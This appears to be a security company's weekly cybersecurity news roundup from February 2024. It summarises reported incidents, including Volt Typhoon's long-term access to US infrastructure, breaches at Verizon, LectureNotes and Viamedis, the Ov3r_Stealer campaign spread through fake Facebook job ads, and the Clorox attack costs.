Thursday, February 8th, 2024
Cybersecurity Week in Review (09/02/24)
Chinese Hackers Hid in US Infrastructure Network for 5 Years
The Chinese Volt Typhoon cyber-espionage group infiltrated a critical infrastructure network in the United States and remained undetected for at least five years before being discovered, according to a joint advisory from CISA, the NSA, the FBI, and partner Five Eyes agencies.
Volt Typhoon hackers are known for extensively using living off the land (LOTL) techniques as part of their attacks on critical infrastructure organizations. They’re also using stolen accounts and leverage strong operational security, which enables them to avoid detection and maintain long-term persistence on compromised systems.
“In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years,” the agencies said.
“Volt Typhoon actors conduct extensive pre-exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim’s environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise.”
The Chinese threat group has successfully breached the networks of multiple critical infrastructure organizations across the United States while mainly targeting the communications, energy, transportation, and water/wastewater sectors.
Its targets and tactics also diverge from typical cyber espionage activities, leading authorities to conclude with high confidence that the group aims to position itself within networks that provide them with access to Operational Technology (OT) assets with the end goal of disrupting critical infrastructure.
U.S. authorities are also apprehensive of Volt Typhoon exploiting this access to critical networks to cause disruptive effects, particularly amidst potential military conflicts or geopolitical tensions.
“Volt Typhoon actors are seeking to pre-position themselves—using living off the land (LOTL) techniques—on IT networks for disruptive or destructive cyber activity against U.S. critical infrastructure in the event of a major crisis or conflict with the United States,” CISA warned.
“This is something we have been addressing for a long time,” said Rob Joyce, NSA’s Director of Cybersecurity and Deputy National Manager for National Security Systems (NSS).
“We have gotten better at all aspects of this, from understanding Volt Typhoon’s scope, to identifying the compromises likely to impact critical infrastructure systems, to hardening targets against these intrusions, to working together with partner agencies to combat PRC cyber actors.”
The advisory is also accompanied by a technical guide with information on how to detect Volt Typhoon techniques and if they were used to compromise their organization’s networks, as well as mitigation measures to secure them against attackers using Living Off the Land techniques.
The Chinese threat group, also tracked as Bronze Silhouette, has been targeting and breaching U.S. critical infrastructure since at least mid-2021, according to a May 2023 report published by Microsoft.
Verizon Says Data Breach Impacted 63,000 Employees
Telecommunications giant Verizon Communications is notifying more than 63,000 employees that their personal information was exposed in an internal data breach. The company has informed the Maine Attorney General’s Office that the incident was discovered on December 12, 2023, but that it occurred on or around September 21, 2023.
“A Verizon employee obtained a file containing certain employee personal information without authorization and in violation of company policy,” the company’s notification letter to the impacted individuals reads.
Verizon’s investigation determined that the file contained names, addresses, dates of birth, Social Security numbers, other national identifiers, gender details, union affiliation, and compensation information.
Verizon says it has started improving its technical controls to prevent similar incidents and is also notifying applicable regulators.
“At this time, we have no evidence that this information has been misused or shared outside of Verizon as a result of this issue,” the company notes.
However, the impacted individuals are being offered free identity protection and credit monitoring services.
Verizon informed the Maine AGO that a total of 63,206 individuals were affected by the incident. All appear to be current employees, based on the company’s note that instructions for identity protection and credit monitoring services enrollment will be delivered to their work email addresses.
The data breach, a Verizon spokesman said, was the result of an employee inappropriately handling the file containing personal information, without ill intent.
“At this point, we have no reason to believe the information was improperly used or that it was shared outside of Verizon. There is no indication of malicious intent nor do we believe the information was shared externally,” Verizon’s spokesman said.
Source – https://www.securityweek.com/verizon-discloses-internal-data-breach-impacting-63000-employees/
Two Million Affected as Learning App Suffers Data Leak
A misconfigured database on the LectureNotes Learning App, a platform for sharing class notes, has exposed more than two million user records. In December 2023, researchers discovered a misconfigured MongoDB database belonging to LectureNotes. The database was being updated in real-time and exposed the personal and access data of users and app admins.
A total of 2,165,139 user records were compromised, with the leaked data including:
- Username
- First and last name
- Encrypted password
- Phone number
- IP address
- User-agent
- Session tokens
LectureNotes is a platform for students, teachers, and institutions to share class notes peer-to-peer, aiming to remove dictation from classrooms. According to Google Play, the app has been downloaded more than half a million times and has 12.9 thousand reviews, averaging 2.5 stars out of 5.
The exposure of session tokens poses a severe threat, potentially allowing a potential attacker to illicitly access user sessions without requiring passwords. Furthermore, the compromised administrator authorization details, including IDs and secrets, elevate the risk by providing unauthorized access to privileged accounts, possibly leading to malicious activities and unauthorized control over the platform’s functionalities.
Exposed session tokens could be re-used to access the user’s session without actually entering the password. Cyberattackers could exploit leaked admin credentials to deploy ransomware, conduct phishing attacks, and cause other potentially significant damage.
Researchers attribute the leak to a misconfigured MongoDB database that was left public. This situation could have been prevented with proper authentication and access controls.
“The rule of thumb for MongoDB administrators is always to enable authentication and ensure that only authorized users can access the database. Using strong passwords and keyfile authentication improves security,” researchers suggest.
MongoDB default options often lack strong security features, and administrators often overlook this, especially the omission of the `security.authorization: enabled` setting, encryption configurations, or access controls.
They also recommend implementing monitoring solutions to detect unusual activity or potential security incidents and setting up alerts for suspicious events for rapid response.
MongoDB stores data in a flexible format similar to JSON and is a popular choice as a NoSQL database solution. Misconfigurations in MongoDB databases led to leaks that exposed a million crypto exchange GokuMarket users, customers at nine crypto exchanges in Russia, 13 million fortune-telling website WeMystic’s users, Dubai’s largest taxi app clients, and others.
Source – https://cybernews.com/security/lecturenotes-data-leak-two-million-affected/
China Hackers Penetrate Dutch Military Network via FortiGate
State-backed Chinese cyber espionage has targeted the Dutch military via Fortinet FortiGate devices. The malware was discovered on a separate computer in the armed forces in 2023. The Military Intelligence and Security Service (MIVD) determined that a China state-sponsored actor was behind the attack.
The MIVD said it had discovered malware used by China specifically for espionage purposes. Attackers leverage a flaw in FortiGate devices to remotely connect to networks.
The Dutch military’s computer was used for unclassified research and development, the system was self-contained, and, therefore, didn’t cause any collateral damage.
“For the first time, the MIVD has chosen to make public a technical report on the working methods of Chinese hackers. It is important to attribute such espionage activities by China,” said Defense Minister Kajsa Ollongren. “In this way we increase international resilience against this type of cyber espionage.”
The malware was installed using a known vulnerability in FortiGate devices. The vulnerability CVE-2022-42475 was classified as high impact in December 2022.
Experts specified that the malware, a remote access trojan (RAT), was aimed not at gaining, but maintaining access to the network.
Source – https://cybernews.com/news/china-hackers-dutch-military-network/
Hackers Exploit Job Boards, Stealing Millions of Resumes and Personal Data
Employment agencies and retail companies chiefly located in the Asia-Pacific (APAC) region have been targeted by a previously undocumented threat actor known as ResumeLooters since early 2023 with the goal of stealing sensitive data.
The hacking crew’s activities are geared towards job search platforms and the theft of resumes, with as many as 65 websites compromised between November 2023 and December 2023. The stolen files are estimated to contain 2,188,444 user data records, of which 510,259 have been taken from job search websites. Over two million unique email addresses are present within the dataset.
By using SQL injection attacks against websites, the threat actor attempts to steal user databases that may include names, phone numbers, emails, and DoBs, as well as information about job seekers’ experience, employment history, and other sensitive personal data.
Researchers also uncovered evidence of cross-site scripting (XSS) infections on at least four legitimate job search websites that are designed to load malicious scripts responsible for displaying phishing pages capable of harvesting administrator credentials.
ResumeLooters is the second hacking group after GambleForce that has been found staging SQL injection attacks in the APAC region since the latter’s public disclosure in late December 2023.
A majority of the compromised websites are based in India, Taiwan, Thailand, Vietnam, China, Australia, and Turkey, although compromises have also been reported from Brazil, the U.S., Turkey, Russia, Mexico, and Italy.
The modus operandi of ResumeLooters involves the use of the open-source sqlmap tool to carry out SQL injection attacks and drop and execute additional payloads such as the BeEF (short for Browser Exploitation Framework) penetration testing tool and rogue JavaScript code designed to gather sensitive data and redirect users to credential harvesting pages.
Analysis of the threat actor’s infrastructure reveals the presence of other tools like Metasploit, dirsearch, and xray, alongside a folder hosting the pilfered data.
The campaign appears to be financially motivated, given the fact that ResumeLooters have set up two Telegram channels named 渗透数据中心 and 万国数据阿力 as of last year to sell the information.
Source – https://thehackernews.com/2024/02/hackers-exploit-job-boards-in-apac.html
A Chicago Children’s Hospital Has Taken Its Networks Offline After a Cyberattack
A Chicago children’s hospital has been forced to take its networks offline after an unspecified cyberattack, limiting access to medical records and hampering communication by phone or email since the middle of last week.
The situation at Lurie Children’s Hospital had all the hallmarks of a ransomware attack, although hospital officials would not confirm or deny the cause Monday.
The hospital initially described the issue Wednesday as a network outage. On Thursday, officials released public statements saying the hospital had taken its networks offline as part of its response to a “cybersecurity matter.”
“We are taking this very seriously, investigating with the support of leading experts, and are working in collaboration with law enforcement agencies,” the hospital said in a statement Thursday. “As Illinois’ leading provider for pediatric care, our overarching priority is to continue providing safe, quality care to our patients and the communities we serve. Lurie Children’s is open and providing care to patients with as limited disruption as possible.”
Media representatives for the hospital did not return messages seeking more information, including whether the attack was caused by ransomware. Such extortion-style attacks are popular among those seeking financial gain by locking data, records or other critical information, and then demanding money to release it back to the owner.
A 2023 report by the Department of Health and Human Services warned of dramatic increases in digital attacks on health care and public health entities in recent years, causing delayed or disrupted care for patients across the country.
Health care providers aren’t alone; state courts, county or state governments and schools all have struggled to recover from cyber-based attacks.
The latest annual report for Lurie Children’s said staff treated around 260,000 patients last year. Chicago-area pediatrician practices that work with the hospital also have reported being unable to access digital medical records because of the attack.
On Friday, the hospital announced a separate call center for patients to get prescriptions refilled or ask non-urgent questions about care or appointments.
Data Breach at French Healthcare Services Firm Puts Millions at Risk
French healthcare services firm Viamedis suffered a cyberattack that exposed the data of policyholders and healthcare professionals in the country. Though the company’s website remains offline at the time of writing, an announcement was posted on LinkedIn warning of the data breach.
The data exposed in the attack includes a beneficiary’s marital status, date of birth, social security number, name of health insurer, and guarantees open to third-party payment. The company has clarified that the breached systems did not store people’s banking information, postal details, telephone numbers, and email addresses.
For healthcare professionals, Viamedis says they will be sending different notifications about what data was exposed. Viamedis has informed impacted health organizations, filed a complaint with the public prosecutor, and notified the authorities (CNIL, ANSSI) accordingly. Currently, the company continues to investigate the impact of the cyberattack.
Regarding the scale of the breach, Viamedis has not stated the number of exposed individuals, but it is known that it manages payments for 84 healthcare organizations covering 20 million insured individuals.
The firm’s General Director, Christophe Cande, told Agence France-Presse (AFP) that an investigation is underway to determine the scope of the breach.
“To date, we do not have the number of insured individuals impacted; we are still in the process of investigation.” – Cande (GD Viamedis)
Cande has also clarified that the cyberattack wasn’t ransomware. Instead, he said a successful phishing attack on an employee allowed the threat actor to breach its systems.
One of the organizations working with Viamedis, Malakoff Humanis, has posted a notice on its website confirming the indirect impact of the Viamedis data breach. The company is also sending data breach notifications to impacted customers to inform them of the cyberattack and disruption of services.
Their message reiterates the information disclosed in the Viamedis notice and assures clients that no banking, medical, or contact details stored on the platforms have been compromised.
Malakoff Humanis says access to user accounts and reimbursement claims remains available. However, the temporary disconnection of the Viamedis platform is expected to affect the provision of certain healthcare services.
Other service providers using Viamedis, including Carte Blanche Partenaires, Itelis, Kalixia, Santéclair, and Audiens, are expected to experience similar situations.
Local media in France reported that Viamedis wasn’t the only target of the cyberattack. Reportedly, a company named “Almerys,” which is also a payment processor for healthcare organizations, was also targeted.
Fake Facebook Job Ads Spreading ‘Ov3r_Stealer’ to Steal Crypto and Credentials
Threat actors are leveraging bogus Facebook job advertisements as a lure to trick prospective targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer. This malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors.
Ov3r_Stealer is capable of siphoning IP address-based location, hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.
While the exact end goal of the campaign is unknown, it’s likely that the stolen information is offered for sale to other threat actors. Another possibility is that Ov3r_Stealer could be updated over time to act as a QakBot-like loader for additional payloads, including ransomware.
The starting point of the attack is a weaponized PDF file that purports to be a file hosted on OneDrive, urging users to click on an “Access Document” button embedded into it.
Researchers identified the PDF file being shared on a fake Facebook account impersonating Amazon CEO Andy Jassy as well as via Facebook ads for digital advertising jobs.
Users who end up clicking on the button are served an internet shortcut (.URL) file that masquerades as a DocuSign document hosted on Discord’s content delivery network (CDN). The shortcut file then acts as a conduit to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary (“control.exe”).
The execution of the CPL file leads to the retrieval of a PowerShell loader (“DATA1.txt”) from a GitHub repository to ultimately launch Ov3r_Stealer.
It’s worth noting at this stage that a near-identical infection chain was recently disclosed by Trend Micro as having put to use by threat actors to drop another stealer called Phemedrone Stealer by exploiting the Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025, CVSS score: 8.8).
The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r_Stealer shares code-level overlaps with Phemedrone.
Further solidifying the connections between the two stealer malware, the threat actor has been observed sharing news reports published about the Phemedrone Stealer on their Telegram channels in an effort to build “street cred” for their malware-as-a-service (MaaS) business.
The findings come as it was revealed that threat actors are advertising their access to law enforcement request portals of major organizations like Binance, Google, Meta, and TikTok by exploiting credentials obtained from infostealer infections.
Source – https://thehackernews.com/2024/02/beware-fake-facebook-job-ads-spreading.html
U.S. Sanctions 6 Iranian Officials for Critical Infrastructure Cyber Attacks
The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) announced sanctions against six officials associated with the Iranian intelligence agency for attacking critical infrastructure entities in the U.S. and other countries.
The officials include Hamid Reza Lashgarian, Mahdi Lashgarian, Hamid Homayunfal, Milad Mansuri, Mohammad Bagher Shirinkar, and Reza Mohammad Amin Saberian, who are part of the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC).
Reza Lashgarian is also the head of the IRGC-CEC and a commander in the IRGC-Qods Force. He is alleged to have been involved in various IRGC cyber and intelligence operations.
The Treasury Department said it’s holding these individuals responsible for carrying out “cyber operations in which they hacked and posted images on the screens of programmable logic controllers manufactured by Unitronics, an Israeli company.”
In late November 2023, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that the Municipal Water Authority of Aliquippa in western Pennsylvania was targeted by Iranian threat actors by exploiting Unitronics PLCs.
The attack was attributed to an Iranian hacktivist persona dubbed Cyber Av3ngers, which came to the forefront in the aftermath of the Israel-Hamas conflict, staging destructive attacks against entities in Israel and the U.S.
The group, which has been active since 2020, is also said to be behind several other cyber attacks, including one targeting Boston Children’s Hospital in 2021 and others in Europe and Israel.
“Industrial control devices, such as programmable logic controllers, used in water and other critical infrastructure systems, are sensitive targets,” the Treasury Department noted.
“Although this particular operation did not disrupt any critical services, unauthorized access to critical infrastructure systems can enable actions that harm the public and cause devastating humanitarian consequences.”
The development comes as another pro-Iranian “psychological operation group” known as Homeland Justice said it attacked Albania’s Institute of Statistics (INSTAT) and claimed to have stolen terabytes of data.
Homeland Justice has a track record of targeting Albania since mid-July 2022, with the threat actor most recently observed delivering a wiper malware codenamed No-Justice.
Source – https://thehackernews.com/2024/02/us-sanctions-6-iranian-officials-for.html
Clorox says Cyberattack Caused $49 Million in Expenses
Clorox has confirmed that a September 2023 cyberattack has so far cost the company $49 million in expenses related to the response to the incident. Clorox is an American manufacturer of consumer and professional cleaning products with 8,700 employees and almost $7.5 billion in revenue for 2023.
On August 11th, Clorox suffered a cyberattack that caused significant disruption in the company’s operation, leading to lowered production and decreased availability of consumer products. In an earnings report filed with the SEC on Thursday, Clorox disclosed it incurred $49 million in expenses related to the cyberattack by the end of 2023.
“The costs incurred relate primarily to third-party consulting services, including IT recovery and forensic experts and other professional services incurred to investigate and remediate the attack, as well as incremental operating costs incurred from the resulting disruption to the Company’s business operations,” reads the Clorox 2024 Q2 Quarterly report.
The company has acknowledged that they are still working to recover from the attack but expects to incur lessening costs related to the cyberattack in the future.
“Our second quarter results reflect strong execution on our recovery plan from the August cyberattack,” said Clorox Chair and CEO Linda Rendle in an 8-K filing.
“We are rebuilding retailer inventories ahead of schedule, enabling us to return to merchandising and restore distribution. While there is still more work to do, we’re focused on executing with excellence in what remains a challenging environment to drive top-line growth and rebuild margin.”
Johnson Controls International also confirmed this week that a September 2023 ransomware attack cost the company $27 million in expenses, leading to a data breach after hackers stole corporate data.
While Clorox has not provided many details about their attack, Bloomberg reported that it is believed to have been conducted by the hacker collective known as Scattered Spider.
Scattered Spider is a loose-knit group of threat actors, many of them English-speaking, who specialize in social engineering attacks to breach a company’s networks. What makes Scattered Spider so unusual is they are also affiliates of the BlackCat/ALPHV ransomware gang, who usually only work with Russian-speaking threat actors. Scattered Spider has been previously linked to attacks on MGM, Caesars, DoorDash, and Reddit.
Contact Us
The data you supply here will not be added to any mailing list or given to any third party providers without further consent. View our Privacy Policy for more information.